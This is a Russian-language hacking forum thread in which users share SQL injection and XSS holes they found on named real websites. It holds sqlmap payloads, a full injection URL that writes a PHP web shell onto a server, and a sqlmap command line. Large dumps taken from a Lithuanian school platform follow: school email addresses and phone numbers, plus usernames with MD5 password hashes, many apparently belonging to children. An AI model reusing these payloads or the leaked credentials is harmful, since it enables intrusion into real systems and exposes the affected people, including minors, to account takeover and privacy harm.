• XSS.stack #1 – первый литературный журнал от юзеров форума

Найденные интересеные SQL inj & XSS

Код:
Parameter: skid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: skid=-1709' OR 7993=7993-- yUsK&ti=UExQIFJ1bGUgQmFzZWQ6U2hvcCBBbGwgU2FsZSA6MToxNTo=
---
web application technology: Nginx
back-end DBMS: IBM DB2

http://www.backcountry.com/dynafit-...QIFJ1bGUgQmFzZWQ6U2hvcCBBbGwgU2FsZSA6MToxNTo= | Alexa Rank: 7831 | Country: US | Not CloudFlare

WAF type Kona
 
https://coinarbitragebot.com/market.php?ex=tradesatoshi

Код:
---
Parameter: ex (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ex=tradesatoshi' AND (SELECT 6151 FROM (SELECT(SLEEP(5)))Vxbf) AND 'mRGh'='mRGh

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: ex=-5830' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6b71,0x70466e5367766a614157636d4e496d5a43594f4e7a6b746850777a6b565559766d56694a4e456a4a,0x7162787071),NULL,NULL-- QZWc
---

[INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12

available databases [17]:                                                                                                                                                                                                            
[*] aio
[*] ayfon
[*] burkul
[*] filehippo
[*] information_schema
[*] instagramvid
[*] lyrics
[*] lyricstalk
[*] lyricx
[*] mp3_lyrics
[*] mp3bueno
[*] mp3raid
[*] mp3skull
[*] mysql
[*] performance_schema
[*] ringtone_stats
[*] seotools
 
Последнее редактирование:
XSS

У вас должно быть более 1 сообщений для просмотра скрытого контента.

<OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">
<responseDate>2019-09-17T08:03:37Z</responseDate>
<request>http://citeseerx.ist.psu.edu/oai2</request>
<error code="badVerb">Illegal OAI-PMH verb: ><script</error>
</OAI-PMH>
 
Пардноньте, апну. Стоял нужный список в врапере и туда затесался этот корейский монстр.
алекса 2.8к, посещалка 400к в день, я ради интереса пытался покрутить, но там ваф жрет прокси и посылает на север страны. Может кому интересно будет :)

 
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
http://ziam.ru/buy-phone.php?id=-1%27%20uNion%20SelEcT%20null,%27%3C?php%20%20system%28$_POST[%22a%22]%29;?%3E%27%20%20into%20outfile%20%20%27/home/wp/ziam/images/15.php%27+--+-
sql с хорошими правами

сам шелл

Ядро ебабелно
 
Код:
http://ziam.ru/buy-phone.php?id=-1%27%20uNion%20SelEcT%20null,%27%3C?php%20%20system%28$_POST[%22a%22]%29;?%3E%27%20%20into%20outfile%20%20%27/home/wp/ziam/images/15.php%27+--+-
sql с хорошими правами

сам шелл

Ядро ебабелно
Админ просто топовый. Что сайт кривой весь, что сервер.
 
Скрытый контент для зарегистрированных пользователей.
dating.meta.ua




 
-u https://ismaniejirobotai.ugdome.lt/index.php?mod=16 --random-agent --level=3 --risk=3 --threads=10 --dbs

Онлайн школа Латвии

Parameter: mod (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mod=16' AND 9719=9719-- nsWg

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: mod=16' OR (SELECT 3335 FROM(SELECT COUNT(*),CONCAT(0x7171786a71,(SELECT (ELT(3335=3335,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hPxT

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
Payload: mod=16' AND SLEEP(5)-- ShKf


+------------------+
| apps |
| avatars |
| events |
| favorites |
| groups |
| messages |
| modules |
| permissions |
| results |
| robot_animations |
| schools |
| sequence |
| sequence_items |
| settings |
| shop_items |
| shop_items_rel |
| sounds |
| users |
+------------------+


+----------------------------------------------------+-----------------+
| email | phone |
+----------------------------------------------------+-----------------+
[04:07:40] [WARNING] console output will be trimmed to last 256 rows due to large table size
| ringaile.j@gmail.com | 310-49322 |
| rkersnauskiene@gmail.com | 444-49503 |
| rokuvm@rokai.kaunas.lm.lt | 343-66084 |
| rozdarzelis@yahoo.com | 313-45703 |
| rstovolos@gmail.com | 380-44849 |
| ruc@takas.lt | 448-71722 |
| rudiliumok@erdves.lt | 380-48313 |
| rudnosiukasdarzelis@gmail.com | 45-462335 |
| ruklosdarzelis@gmail.com | 443-42226 |
| rumsiskiu.darzelis@kaisiadorys.lt | 315-43271 |
| rutele@plunge.lt | 6-3007474 |
| rutelesdm@rutele.kaunas.lm.lt | 45-595324 |
| Rutos-dm@takas.lt | 343-70782 |
| ruzgumokykla@gmail.com | 37-377610 |
| rvabvm@gmail.com | 458-63278 |
| rytas.kedainiai@delfi.lt | 528-66561 |
| rytas@rytas.kaunas.lm.lt | 342-30589 |
| rytmetys@lycos.com | 657-82787 |
| rytomok@takas.lt | 46-452074 |
| sadute@gmail.com | 343-42681 |
| sakalelis@balticum-tv.lt | 347-71357 |
| sakprad@sakalelis.alytus.lm.lt | 381-56435 |
| salamiesciomokykla@gmail.com | 380-36916 |
| salantug@salantai.kretinga.lm.lt | 5-2552230 |
| salociumokykla@gmail.com | 343-72446 |
| salten@takas.lt | 345-42160 |
| saltinelis.klaipeda@gmail.com | 37-567767 |
| saltinelis12a@gmail.com | 46-442266 |
| saltinelis@ignalina.lt | 37-332692 |
| saltinelisvd@gmail.com | 443-39030 |
| saltinis.mokykla@zebra.lt | 46-453243 |
| salyssemerys@takas.lt | 37-543259 |
| samurai@mail.lt | 37-373625 |
| sanat.mokykla@gmail.com | 37-391421 |
| sanciudarzelis@gmail.com | 46-313789 |
| sanciuvm@sanciai.kaunas.lm.lt | 349-35976 |
| sanmokykla@zebra.lt | 310-44690 |
| santarves@gmail.com | 315-75560 |
| sargdarz@takas.lt | 46-322283 |
| sarkele@parabole.lt | 46-410955 |
| sasnamok@yahoo.com | 46-454149 |
| saukenai@centras.lt | 441-44191 |
| saulemok@gmail.com | 310-44126 |
| saulespradine@marsatas.lt | 443-71454 |
| sauletekioampm@takas.lt | 426-53937 |
| sauletekis9@gmail.com | 347-33189 |
| saulute@infotakas.lt | 5-2493573 |
| saulute@jonava.lt | 37-312038 |
| saulute@plunge.lt | 46-319014 |
| saulutesmd@gmail.com | 310-57176 |
| savickiene.jadvyga@gmail.com | 389-62083 |
| sdaukantopm@sdaukantas.kretinga.lm.lt | 5-2517280 |
| sedosdarzelis@gmail.com | 41-524613 |
| seiriju.darzelis@lazdijai.lt | 380-51227 |
| seiriju.mokykla@lazdijai.lt | 380-54440 |
| sekretore@atgimimas.w3.lt | 310-40665 |
| sekretore@klaipepedosausrine.lt | 46-497893 |
| sekretore@kurtieji.lt | 37-399270 |
| sekretore@pakrazantis.kelme.lm.lt | 441-40142 |
| sekretore@ramygalosgimnazija.lt | 343-52959 |
| sekretore@veivirzenugimnazija.lt | 5-2597224 |
| sekretore@vyturys.klaipeda.lm.lt | 347-38242 |
| sekretoriatas@pusaite.lt | 41-524611 |
| semeliskes@gmail.com | 37-341412 |
| semeliskiudarzelis@gmail.com | 37-451420 |
| senamiesciovm@mail.lt | 677-73072 |
| sendvaris@takas.lt | 347-37265 |
| senprad@senamiestis.alytus.lm.lt | 381-57802 |
| sepetos@mail.lt | 380-48146 |
| sermuksnele@freemail.lt | 440-53314 |
| sestoku.mokykla@lazdijai.lt | 380-48356 |
| setos.soc-centras@kedainiai.lt | 441-42881 |
| sileliskaunas@gmail.com | 45-557446 |
| silgaliai.pagrindine@takas.lt | 347-31157 |
| siloprm@silas.kaunas.lm.lt | 342-43236 |
| sim@saulute.kaunas.lm.lt | 382-45346 |
| simnovd@gmail.com | 459-35180 |
| simoniumokykla@takas.lt | 5-2460883 |
| simpriekule@gmail.com | 448-48117 |
| sitkunumokykla@gmail.com | 426-60872 |
| siupariai.rastine@erdves.lt | 5-2494487 |
| skirsnemunesmo@takas.lt | 385-58332 |
| sldpusynelis@takas.lt | 349-45 268 |
| slienava@gmail.com | 426-45226 |
| smalininkm@takas.lt | 319-48545 |
| smalsutis2@gmail.com | 425-43721 |
| smalsutis@ekspresas.lt | 46-476212 |
| smcmari@delfi.lt | 46-446322 |
| smeltesm@gmail.com | 37-542249 |
| smuikoraktelis@gmail.com | 41-426407 |
| spindulelis@res.lt | 421-43741 |
| spindulelis_kaunas@hotmail.com | 46-324124 |
| stanulionis@erdves.lt | 5-272 0555 |
| stebuliu.mokykla@lazdijai.lt | 342-31650 |
| strazdelio.m@erdves.lt | 45-464425 |
| stulginskiovm@stulginskis.kaunas.lm.lt | 340-41468 |
| stulpino.mokykla@gmail.com | 37-551874 |
| suginciu.v.m@moletai.lt | 387-66185 |
| sukioniupm@gmail.com | 5-232 2877 |
| sunskai@takas.lt | 450-56567 |
| surviliskis.mokykla@kedainiai.lt | 422-46430 |
| svalios@pasvalys.lt | 342-20056 |
| svedasu.mokykla@takas.lt | 41-559241 |
| sveicarija@zebra.lt | 37-386706 |
| sventezerio.mokykla@lazdijai.lt | 380-35128 |
| sventragiodarzelis@gmail.com | 46-440291 |
| svet.mokykla@gmail.com | 37-436036 |
| svirnelisld@gmail.com | 679-71332 |
| svm_rastine@zebra.lt | 427-42417 |
| svyturelis@balticum-tv.lt | 447-72790 |
| tauralaukis@inbox.lt | 37-561285 |
| tijunaicio.mokykla@kaisiadorys.lt | 458-57323 |
| tirkdarzelis@takas.lt | 343-41007 |
| tirkiliskiupm@takas.lt | 343-27816 |
| tirksliu.v.m@gmail.com | 37-422953 |
| traupis_mok@yahoo.com | 421-49622 |
| triskoniupm@takas.lt | 5-242 3917 |
| troskunu@takas.lt | 41-377008 |
| truskavosmokykla@gmail.com | 528-39660 |
| tukasdm@ tukas.kaunas.lm.lt | 46-346249 |
| tytuv.l.d@gmail.com | 345-49714 |
| tytvm@takas.lt | 441-41544 |
| ucnaminukas@gmail.com | 383-43710 |
| udrijos_mokykla@takas.lt | 41-373866 |
| ukrinu.mokykla@gmail.com | 386-73359 |
| universavia@gmail.com | 448-68652 |
| upninku.mokykla@gmail.com | 37-312049 |
| urbsiovm@urbsys.kaunas.lm.lt | 449-74035 |
| ustukium@pasvalys.lt | 5-251 3284 |
| uzlieknesmokykla@mail.ru | 37-345873 |
| uzvenciovidurine@takas.lt | 441-47135 |
| uzventis-zilvytis@zebra.lt | 345-43231 |
| v.d.vyturelis@takas.lt | 389-54558 |
| vabalninko.darzelis@gmail.com | 427-55242 |
| vadas3@erdves.lt | 37-563144 |
| vadokliai@erdves.lt | 443-40258 |
| vadovasberzelis@super.lt | 444-78488 |
| vadzgiriopm@gmail.com | 385-56531 |
| vaidilute@takas.lt | 45-555633 |
| vaidotopm@vaidotas.kaunas.lm.lt | 342-63423 |
| vaiguvosmokykla@takas.lt | 441-55392 |
| vaikyste@net.davgita.lt | 343-22039 |
| vaisodziai@takas.lt | 41-375824 |
| vaisvydavosvm@vaisvydava.kaunas.lm.lt | 343-29032 |
| vaivor@vaivorykste.lm.lt,vbiblio@vaivorykste.lm.lt | 448-47637 |
| vaivorykste@kalnieciai.lt | 46-345910 |
| vaivorykste@takas.lt | 37-397296 |
| vaizgantovm@vaizgantas.kaunas.lm.lt | 349-47330 |
| valakeliai@pasvalys.lt | 671-15482 |
| vandarzelis@gmail.com | 346-48415 |
| vanmokykla@gmail.com | 444-45187 |
| varlaukis@gmail.com | 458-78805 |
| varpelis.kedainiai101@gmail.com | 528-28051 |
| varpelis38@gmail.com | 447-49404 |
| varpelisdarz@takas.lt | 45-517885 |
| varpelisld@gmail.com | 46-346248 |
| vdnykstukas@zebra.lt | 656-25675 |
| vdziogelis@takas.lt | 45-552214 |
| veisieju.darzelis@lazdijai.lt | 380-43257 |
| veisieju.mokykla@lazdijai.lt | 445-78987 |
| velziodarzelis@gmail.com | 380-43142 |
| vencmok@gmail.com | 41-375396 |
| ventos.darzelis@gmail.com | 444-78502 |
| ventosvm@mazeikiai.lt | 37-345868 |
| ventos_vm@akmene.lt | 5-270 3140 |
| verdene@gmail.com | 37-383854 |
| verinelis23@gmail.com | 447-72349 |
| verinelis@takas.lt | 425-57008 |
| versme.klaipeda@gmail.com | 315-68685 |
| versmep@takas.lt | 310-44831 |
| versmes@gmail.com | 347-35155 |
| versmesvm@versme.kaunas.lm.lt | 340-64139 |
| versvuvm@versvos.kaunas.lm.lt | 349-30043 |
| veseta@delfi.lt | 5-2485988 |
| vetrungesprm@vetrunge.kaunas.lm.lt | 343-54346 |
| vezaiciudarz@takas.lt | 5-2494823 |
| vezaiciumokykla@gmail.com | 5-2494368 |
| vida.cizauskiene@gmail.com | 41-370121 |
| vida@buksavimi.lt | 41-524570 |
| videniskiupm@gmail.com | 5-2469879 |
| vidsodmla@takas.lt | 345-47689 |
| vieksniug@gmail.com | 389-71831 |
| viesintosmokykla@erdves.lt | 41-377524 |
| vievio.pradine@gmail.com | 37-362621 |
| vildm@viltis.alytus.lm.lt | 5-245 5798 |
| vileisiovm@vileisis.kaunas.lm.lt | 349-54642 |
| vilijampolesvm@vilijampole.kaunas.lm.lt | 449-46638 |
| vilkijadaigelis@zebra.lt | 346-20280 |
| vilkijosgimnazija@gmail.com | 444-60211 |
| vilkyskiu_vidm@takas.lt | 46-340415 |
| vite5@takas.lt | 347-41151 |
| vliepaite@gmail.com | 37-269220 |
| volungele@parabole.lt | 41-519039 |
| volungesvm@volunge.alytus.lm.lt | 381-50860 |
| voveraiteld@voveraite.kretinga.lm.lt | 5-2605546 |
| vplikiupagrmokykla@gmail.com | 5-2698127 |
| vpm@jurbarkas.omnitel.net | 458-51540 |
| vrcmbitute@takas.lt | 37-377627 |
| vuc@centras.kretinga.lm.lt | 5-2490237 |
| vvm@mail.lt | 342-30003 |
| vydunovm@vydunas.kaunas.lm.lt | 449-41748 |
| vyturelis.darzmok@lazdijai.lt | 444-60271 |
| vyturelis.kedainiai@gmail.com | 528-61223 |
| vyturelis012@gmail.com | 41-552232 |
| vyturelis17@gmail.com | 5-2698122 |
| vyturelis@birstonas.lt | 427-56273 |
| vyturelis@plunge.lt | -0 |
| vyturelis@zebra.lt | 449-41435 |
| vyturiovm@vyturys.kaunas.lm.lt | 449-57205 |
| vyturys@vyturys.harvista.lt | 37-566368 |
| zagares.darzelis@gmail.com | 389-55369 |
| zagaresgimnazija@gmail.com | 389-35544 |
| zagaresspecialiojikristina@gmail.com | 319-59146 |
| zapyskio.darzelis@gmail.com | 346-51805 |
| zapyskiopm@zapyskis.lm.lt | 426-60904 |
| zara@takas.lt | 46-300177 |
| zasliu.darzelis@kaisiadorys.lt | 315-29331 |
| zasliu.mokykla@kaisiadorys.lt | 460-54302 |
| zeimeliovld@yahoo.com | 310-55116 |
| zeimenos.gimnazija@gmail.com | <blank> |
| zeimiai.mokykla@gmail.com | 443-48141 |
| zelmeneliai@takas.lt | 46-445230 |
| zelsvos.mokykla@delfi.lt | 5-272 4272 |
| zemkalvarijosld@plunge.lt | 380-52878 |
| zemuogele54@mail.ru | 346-60028 |
| zemyna@dokeda.lt | 45-593296 |
| zemynapm@gmail.com | 381-49235 |
| zibartoniai@gmail.com | 386-72947 |
| ziburelio.pradine@gmail.com | 46-345911 |
| zibureliodm@ziburelis.kaunas.lm.lt | 342-49687 |
| ziburelis@ekspresas.lt | 46-444171 |
| ziburiovm@ziburys.kaunas.lm.lt | 449-43446 |
| Zibutedarzelis@yahoo.com | 340-46460 |
| zibuteinfo@gmail.com | 318-41554 |
| zibutemd@zibute.kretinga.lm.lt | 5-2352042 |
| zidikai@takas.lt | 5-234 6146 |
| zidinelisld@gmail.com | 640-19080 |
| ziezmariu.darzelis@kaisiadorys.lt | 386-74967 |
| ziezmariu.mokykla@kaisiadorys.lt | 458-41719 |
| zilvinas38@takas.lt | 45-599565 |
| zilvitis.kalvarija@gmail.com | 445-78965 |
| zilvitis@kli.lt | 45-517435 |
| zilvitis@meganet.lt | 37-345881 |
| zilvitis@takas.lt | 444-60234 |
| zilvitiskarmelava@yahoo.com | 451-40458 |
| zilvitis_mok@takas.lt | 528-32537 |
| ziogelis@res.lt | 41-378510 |
| ziogelisdarzelis9@gmail.com | 441-48328 |
| ztuckuviene@gmail.com | 345-69069 |
| zuvedradl@gmail.com | 447-42344 |
| zuvintodarzelis@gmail.com | 46-314764 |
| zvaigzdute27@takas.lt | 342-40688 |
| zvaigzdute@akmene.lt | 41-436453 |
| zvangutis@dokeda.lt | 46-324694 |
| zvirbloniuvd@gmail.com | 448-72522 |
| zvmokykla@takas.lt | 310-47648 |
+----------------------------------------------------+-----------------+


+-----------------------+----------------------------------+---------+
| username | password | email |
+-----------------------+----------------------------------+---------+
[03:39:03] [WARNING] console output will be trimmed to last 256 rows due to large table size
| staias | 26bf516ab3f260c8854cc83d5b9e3a2f | <blank> |
| ugne2b | 9bcdf44259cf895f6fad2489b116335f | <blank> |
| gabutis | a01610228fe998f515a72dd730294d87 | <blank> |
| testas | f128ed8af7a5897e53e21dbfb049265c | <blank> |
| gretute8 | 17612fd84a73cf630bcec99f2721fae5 | <blank> |
| ddairedas | c82df7a2e49d55f910f45dafd8c8566b | <blank> |
| MICE | 08c1f4f61be37445a41221e182141199 | <blank> |
| GabrieleB | ccf3eca233b67623d3a291830de886b4 | <blank> |
| vytaute123 | f05ac36f87baaa3ece2fff18c69184ed | <blank> |
| Karplinavait | ddc642bc95481910e93d4e8917f3cfc7 | <blank> |
| kililiana | d0def19c4fc9d53f0c95135631d49e2c | <blank> |
| Rusnevai | 4e7f5368c37fea0776d0a8a813bcef02 | <blank> |
| NatalijaL | 8ba61833746351fba4961c3ef969a34d | <blank> |
| Juryte2 | e1189f0b644a6ae47960de0745743b57 | <blank> |
| panda06 | afed0800a4d38256dfee12ae29cc9b1d | <blank> |
| geragele77 | 07cbe861fbbba6ca3f14a57abcb7dc45 | <blank> |
| rojuskarsokas | 9adddc40aa55ae13fe8a20dd3e3ffcec | <blank> |
| vilte4 | bd8e41b551d8d0d84564f9ad8f4a3be7 | <blank> |
| snigute | 9fb2396efe23b05db82005fa53420b45 | <blank> |
| bezdalius | 9182b0cb4d45202b2dc6b73425d3e0dc | <blank> |
| elita | 253902d77c8032c2017581075e69a9b1 | <blank> |
| andre000andre | 8743ec68b3be042716076124d276d4a5 | <blank> |
| gegute123 | 619e84ed824d2ad90ab87b1e5dad5a21 | <blank> |
| hgfglytg | f3841991945c68b47d3770ac8fb32c26 | <blank> |
| dadad | eedc18ce8c3cd817f5e321201de03a9f | <blank> |
| Martinelis | e10adc3949ba59abbe56e057f20f883e | <blank> |
| Urtux8 | 39954cfab41a97f5d0c78e7bb940a6bc | <blank> |
| agota2587 | 38dcd1b5e7dcfcf1a4168045988e1fbc | <blank> |
| Damjanas | 81dc9bdb52d04dc20036dbd8313ed055 | <blank> |
| 1254 | a766189744ec951dbddd2b351a0f3125 | <blank> |
| Loginukas_Aronas | 0073ec539178cdb2537928858be6914d | <blank> |
| valdovs | 92169ce6defc45595f6484c11f7f5f3c | <blank> |
| Karolina.42 | 0769d9222adc3cbc6f2a8430dca0c0cf | <blank> |
| elijusl | 2d4a86a88c7acd74aa930d346a7d98fb | <blank> |
| arturas1423336 | 1c229a640374e8bf365bdfe046a5bdba | <blank> |
| vincas4911 | b3d5b1f9d369d2ca3df1e5cc8701321f | <blank> |
| piranija | 5bbb90a9d6c5080f7cdbcb3071439910 | <blank> |
| valerijaa | 8622cd8b4a04ae0854b10d57f96e9b60 | <blank> |
| roboema | 29454fa079ecfbae4c661e9c56bdd7d5 | <blank> |
| Cars | fb4118a314ec814d50d75191f646a28b | <blank> |
| melinda | 25f9e794323b453885f5181f1b624d0b | <blank> |
| troll321 | eb36c3b65d7f88382fd6a359d7c27828 | <blank> |
| Austeja911 | a93674a8f82dadcdaa657061494d67db | <blank> |
| 21robotuke | 00c7f3f1a398dd3ec688cde72d0ee61a | <blank> |
| Mijajuodvalkyte | 8bcebef47508eab55eb602358efca2a3 | <blank> |
| IevaKis | f41b569412ef7581cb80f0b3b61c5fef | <blank> |
| Keite111222333 | 23389c7ccd5476e3c64ae7414eaf42ce | <blank> |
| Cooliukas | 63af2b29e2b9b1e86a996ca22e7a2ab2 | <blank> |
| gustuks | 202cb962ac59075b964b07152d234b70 | <blank> |
| Jokubas5metai | f1fbc0ad7ae0ef8346e5ad9e26793aa7 | <blank> |
| zemleris | 696d666fade8dca8e391d16a67e45e5b | <blank> |
| emuciukas123 | 77be96d7d1a85b215f8a8ce075e2c35e | <blank> |
| valerija123456789 | bb352a83bf0b4d0e986e7335bda65947 | <blank> |
| auge1 | 7461cc65aa99a3c3daec505452045b90 | <blank> |
| salantukas1 | ebb54280b8700215088ae95cc0c65f07 | <blank> |
| vilees | 7ea3100f1186878ee7e76523da3ed3f5 | <blank> |
| Gabijote123 | aa06bebe5bc27135ff564588413cfe70 | <blank> |
| Doy1010 | 500e44cd777708fbef8e4d1232fa740b | <blank> |
| Domulia | b1a64b5c49a3b0e615f3a97c152ee0cc | <blank> |
| 0808 | 4135a6f12bd7b1007140f6c4deec37dc | <blank> |
| gabrytematonyte | 74765968c67007219b197f4d9aafb4e2 | <blank> |
| doviledeimante123 | f812113c57d58afe9b4a2926dc1a6253 | <blank> |
| arnuciukas | f8112f089c22be707e2221118a2ba78a | <blank> |
| Viktorijavikute | d4eabd848fae472f14077769fc7d00b3 | <blank> |
| Verute | 99ccabed315e3609cae2dd150db1210b | <blank> |
| PaulinaSku | 4465a252481c0488002b9eca42f13a8c | <blank> |
| tadastadas | 7666fd222ee675e8d47d53427923f131 | <blank> |
| Gvidas10 | c63b5507c424a92c066b793456b41508 | <blank> |
| periodas10 | 7363a8623e80ccf88dd189e8f5d77d76 | <blank> |
| inas123 | c938489ddb8330955c187d62e032bb43 | <blank> |
| inas | 1b04bcffdf28817ab97481d69b9e1b80 | <blank> |
| alge | 90a624f1f9653941eba3b8589f75c041 | <blank> |
| Matukask | 12e086066892a311b752673a28583d3f | <blank> |
| haris1 | 8f713fd4f54853c13edad7dd9d799e8f | <blank> |
| austenux | 4e14c16ae3d330621837fef1cc1e1709 | <blank> |
| orintulis | 2565f2c851df56b2cbab9924fc14d3d2 | <blank> |
| geretadaugelaite | 31b94d4969412755c76fee163a2ffe0c | <blank> |
| Rugile2008 | 5a890705cbb7477c2232ec4ea9db3e05 | <blank> |
| PovilasB | cbc9ea8233dc50f4a619b5c2ae6a4566 | <blank> |
| has | 102c63120d139e328615920b46a586b5 | <blank> |
| eligijaezerinskaite | 2edfe3d120292a63c6c03563b011a5ac | <blank> |
| Kajus5 | d6950cb8a995f35a6e4ce4660271e5a3 | <blank> |
| Liepiss | 6daf82e97fb9847eac30d9cf26761027 | <blank> |
| Erika18 | 94c53ed3aac124c6c2e0f38c3777dc10 | <blank> |
| Ismaniejirobotaigg | a54a42852c7198cee04b5d9199434c8e | <blank> |
| jurgita200849 | ef8446f35513a8d6aa2308357a268a7e | <blank> |
| Domciukaz | 25f9e794323b453885f5181f1b624d0b | <blank> |
| Grimugne | c2f8ad9697cb14bb7aa38976a76cfbf2 | <blank> |
| vilkas6 | 61aa06053dc2b1fdda891f283c0cb1f4 | <blank> |
| kramtukas | 8493ff7e730c26c235c8830bc29fb696 | <blank> |
| mingaile490 | d4f59fdba13cae2ae5ba06bd64b7cf1a | <blank> |
| saugumasLT | c2f664271b3c5476ab81d18eddc351a9 | <blank> |
| Gabija2010 | f9abe05909d326c07fba2326889e7bfa | <blank> |
| Aaronas | 000f161ccb9da3e02403756b843f065d | <blank> |
| viktorijagrigaityte1 | 54d2720c77a327304067f203a80cac4e | <blank> |
| marcius1208 | 0497f2e0199556b4d498f0e7dbe2e263 | <blank> |
| Gedutis | 164965b04ac96052c0e70354a5d6467a | <blank> |
| Benrika | 73df798be71f824fe8dbeac96f2220fb | <blank> |
| Bristol4321 | d93591bdf7860e1e4ee2fca799911215 | <blank> |
| Dada | 6a88d793f3947a7e265bb056ab89e2f3 | <blank> |
| airidaslt | f89d2869b22baf377d3726e3bafd5283 | <blank> |
| Brigitadeimante | 4460fe2115d868654dbd5a31e5af0cbd | <blank> |
| ??? | acadd87973113f82a8c654e988c9ad87 | <blank> |
| armandasvizgaudis | 509bdcda736e5ad7036ad39159a8a9fc | <blank> |
| nerijus1332 | 785c890c4a9ab8423eb4df152f6db330 | <blank> |
| dianuskis12 | fcb2a8a31800daceb7761abbd28ada20 | <blank> |
| Erdika | b578210b7b2a53006b6c429f5d9f7dc8 | <blank> |
| marta2009 | c498f71114256197e8312c2fff4e55d1 | <blank> |
| medos19 | b3b4e60a3924c2b14504af717d3b5257 | <blank> |
| Rokas111 | b7433696216f6f2e16999f908ff9234e | <blank> |
| Merlindosnamumokykla | fbe4b508b624d7d7246696585afd6583 | <blank> |
| Venuzas | b75d33d4a319757482b87d6103086f75 | <blank> |
| Kajusa?lollol | 506d780eeba4ae8d7324089148ef5db5 | <blank> |
| papuga20 | acf4b89d3d503d8252c9c4ba75ddbf6d | <blank> |
| 67277533 | 6cc711fede664b46dfc20937bbd841aa | <blank> |
| arminass | 68a91327ae389dcbc408c565f3c40eea | <blank> |
| D?engas | c02a2df133bf49cc1ffec114d0bff96a | <blank> |
| puke.voz | 845e2a4fd2b948e62a180a9a96ef1abf | <blank> |
| Quun-karaliene | c4efd5020cb49b9d3257ffa0fbccc0ae | <blank> |
| velnes | fda34ad5b21671480a3625a6d0952063 | <blank> |
| gustyte111 | 2e8508650e20b5e3a791b2b673c91b4b | <blank> |
| Emilijacol | c44a471bd78cc6c2fea32b9fe028d30a | <blank> |
| jonassulskis | 895099787ab04a2f64055fbd70b6590c | <blank> |
| Duola | b59c67bf196a4758191e42f76670ceba | <blank> |
| rokaslol | dd5f9c459d6cb91adc9832dc0c67a271 | <blank> |
| arado | 81dc9bdb52d04dc20036dbd8313ed055 | <blank> |
| pasaulyte | 72b6cc8e3ea36092db976381988fa544 | <blank> |
| Kornelija2019 | b53bd950e88081cfe836b687e6af232b | <blank> |
| Vaidusia | da42d0a2f1868a39307d9bdb064cfe71 | <blank> |
| RugileMilda | e10adc3949ba59abbe56e057f20f883e | <blank> |
| Roberta25 | a374a2e46fd644bf913ba1650b8733f3 | <blank> |
| 197632 | 631861280bd08d28225f3b45512b482e | <blank> |
| 7RenaldG | 168fcadc9032fa10733ce2b51d347eab | <blank> |
| d?iugasbalsevi?ius | 06f47491f5d56bec1d80fcd102ae58fa | <blank> |
| tvasiliauskas | 887eb1a77a5aa1e0716d08bced1c1cc8 | <blank> |
| Emilisdanusas | fa2fdb00ed14575c7e9b86f4c8f7d648 | <blank> |
| lorita1 | b63b6e7857f0991951d3c4cf63ab419d | <blank> |
| skaiste11 | 6acb0784b9dde050a12dc69edc69b45f | <blank> |
| knifeman56664395674q | 8af2dc0ed243f25c8914e5f313f4ad12 | <blank> |
| Labaksjd7soendb | d5c1a85f0df0a3fac5513afd9a801b71 | <blank> |
| mariamiimnadze | 06a319f15a2c70c661fec4b0a826379d | <blank> |
| Emutuke | 9b772ecd62ea21fe229312b366e63e23 | <blank> |
| ur?ule2b | ce949d1e46b0891392ae740e5f450bd6 | <blank> |
| austeja78009 | 37b67974598977ff9b475e6de09fd3c7 | <blank> |
| rugilek | 04b5bf34f6ca564282613b6e0cc5fb1e | <blank> |
| enrikag | 962c0bcbe49f009a56abef38c54688fc | <blank> |
| elzel | 9aaf3d2a03c4c38e0c1dbe4f7086a1a4 | <blank> |
| ROKSE | c2aaebe0dd42bf937cb0c92a47474725 | <blank> |
| Dagaras | 46dd876364d2e4887d5a14a5547e300b | <blank> |
| tadasko | 346faecb0b86487c9943183413bf430a | <blank> |
| Gabrueta | cadcac968c58c87088ca1773d10c093b | <blank> |
| VoveryteLaura | 8cc5b21a7e59a5f257f0391280d44b23 | <blank> |
| Karolinavait | ddc642bc95481910e93d4e8917f3cfc7 | <blank> |
| nedasasdzxc | 19bb5ffe222cc061b10b3e78b600806b | <blank> |
| iefka5552 | 6eea9b7ef19179a06954edd0f6c05ceb | <blank> |
| saulytea1 | 40c744fe57ed61193f9352b3d2884427 | <blank> |
| lolasarmandas | a97e2517a53845d82cbd87787bc94315 | <blank> |
| urte07 | 702c50a87c6c72124ff3bd86a03c9772 | <blank> |
| rugilec1 | 6deb4c0cf9752bb0b0de1151623e1a0b | <blank> |
| Mafis | 6091d67995dbcf8e08e15e49f2e63122 | <blank> |
| marius4 | 535acc5a1f115ae6ebfdf58d0f72661e | <blank> |
| lunna | a6b88b9e3240ff8ea39ef99b8b73b3ff | <blank> |
| vakaris.e | 5b737312e0a62e018cda8f13526d121f | <blank> |
| meduskina | a5d45284d6dc8d4967dab10d23aa3f63 | <blank> |
| tapke12 | 36ba63a25777d94a087fed8788b65886 | <blank> |
| demo?? | a2d10a3211b415832791a6bc6031f9ab | <blank> |
| paulinute | d6b7e5cc5bd331eb2da05dae042f7f45 | <blank> |
| Bizitas | 1738a8cf01ed72cf2196548a971668d9 | <blank> |
| kukuruzas | 71fd70ffea93041178ab18ff5ecb04d1 | <blank> |
| bugis | f655e8f9339af2b629ebed05b585423a | <blank> |
| krasuona1 | 404b2fd0b803c81a7b906b71315091dd | <blank> |
| Saule555 | aa7dfe8a7ad48677289857274fb5f257 | <blank> |
| akvileakvile | 2c6fd55507381d901901e83234214a20 | <blank> |
| pauliusss | 3ff88fe43537b29465442211b0a5e0e2 | <blank> |
